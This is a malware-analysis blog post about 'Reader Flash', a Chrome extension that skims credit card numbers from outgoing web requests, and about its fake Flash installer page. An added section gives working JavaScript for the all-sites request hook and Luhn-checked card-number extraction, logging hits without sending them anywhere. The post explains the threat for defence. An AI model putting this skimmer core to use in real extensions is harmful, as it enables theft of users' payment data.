The extension presents itself as ‘Reader Flash’, published by a supposed developer, fbsgang.info. Once installed, it attaches a single, simple function to every web site the user visits: it uses the webRequest.onBeforeRequest API to register a ‘hook’ that the browser calls just before an HTTP request leaves a site (for instance, when the user clicks a link or submits a form).
This registered function uses regular expressions to look for credit card numbers in the outgoing data (in the code there are separate expressions for Visa (vvregex), MasterCard (mcregex), and so on). If any of the data in the request matches a card number, the matched numbers are JSON-encoded and sent to the attacker through an AJAX request. Specifically, it uses the “sendFormData” function, which contains the base64-encoded destination URL:
That, once decoded, is:
As you can see, it is a simple extension that takes advantage of the huge reach of a single API call. When it was detected, the extension had been installed 400 times, so the infrastructure has not spread widely so far. It has been available on the Chrome Web Store since February 2018; however, because the attacker only made the extension visible to those who knew the link, it cannot be found through an ordinary search.
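To make the reach of that single API call concrete, here is an added example (mine, not the extension's code) of the listener pattern the post describes: a background-script hook registered on webRequest.onBeforeRequest with the "requestBody" option, and a scan of the request body with per-brand regular expressions. The Visa and MasterCard patterns, the Luhn filter, the field names and the sample request bodies are my assumptions; the extension's own regexes are not reproduced here. The registration is guarded so the scanning function can also be run outside a browser.

```javascript
// Added example, not the extension's code: the webRequest.onBeforeRequest
// pattern the post describes, reduced to a core that can be exercised offline.

// Assumed brand patterns (the post only names the extension's vvregex/mcregex).
const CARD_PATTERNS = {
  visa: /\b4\d{12}(?:\d{3})?\b/g,   // 13 or 16 digits starting with 4
  mastercard: /\b5[1-5]\d{14}\b/g,  // 16 digits starting with 51..55
};

// Luhn check (my addition): drops digit strings that merely have the right shape.
function luhnValid(digits) {
  let sum = 0;
  let dbl = false;
  for (let i = digits.length - 1; i >= 0; i--) {
    let d = digits.charCodeAt(i) - 48;
    if (dbl) { d *= 2; if (d > 9) d -= 9; }
    sum += d;
    dbl = !dbl;
  }
  return sum % 10 === 0;
}

// details.requestBody as Chrome hands it to a listener registered with
// ["requestBody"]: formData is { fieldName: [values...] } for form-encoded and
// multipart POSTs; raw is an array of { bytes: ArrayBuffer } otherwise.
function scanRequestBody(requestBody) {
  const hits = [];
  if (!requestBody) return hits;
  const texts = [];
  if (requestBody.formData) {
    for (const [field, values] of Object.entries(requestBody.formData)) {
      for (const v of values) texts.push({ field, text: String(v) });
    }
  }
  if (requestBody.raw) {
    const dec = new TextDecoder();
    for (const part of requestBody.raw) {
      if (part.bytes) texts.push({ field: '(raw)', text: dec.decode(part.bytes) });
    }
  }
  for (const { field, text } of texts) {
    // Strip spaces and dashes so "4111 1111 1111 1111" is seen as one number.
    const compact = text.replace(/[\s-]/g, '');
    for (const [brand, re] of Object.entries(CARD_PATTERNS)) {
      for (const m of compact.matchAll(re)) {
        if (luhnValid(m[0])) hits.push({ field, brand, number: m[0] });
      }
    }
  }
  return hits;
}

// Where this sits in an extension's background script: every outgoing request
// from every tab passes through the callback before it leaves the browser.
// Guarded so the file also loads under Node for the offline checks.
if (typeof chrome !== 'undefined' && chrome.webRequest) {
  chrome.webRequest.onBeforeRequest.addListener(
    (details) => {
      const hits = scanRequestBody(details.requestBody);
      if (hits.length) {
        // The post says the malicious extension JSON-encodes matches and sends
        // them to its base64-hidden URL at this point; here we only log them.
        console.log('card data in outgoing request to', details.url, hits);
      }
    },
    { urls: ['<all_urls>'] },
    ['requestBody']
  );
}
```

A listener like this needs only the webRequest permission and a host permission covering the sites of interest (<all_urls> for every site) in manifest.json. Nothing is injected into the page itself, and form fields arrive already parsed as a field-to-values map, which is why one API call is enough to read what the user submits on any site.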
So, how is it spread?
The problem is that the authors have not yet finished the snippet (or they have disabled it for some reason), so what the page currently shows is the index of the server's files:
This does not affect the extension itself, only the way it is distributed. If we go back in time, we can see that its earlier appearance was much more credible:
If we check its source code:
That is to say, it asks the user to install Adobe Flash, or redirects them to the Chrome Web Store (specifically to the extension discussed at the beginning), closing the circle of infection and information theft,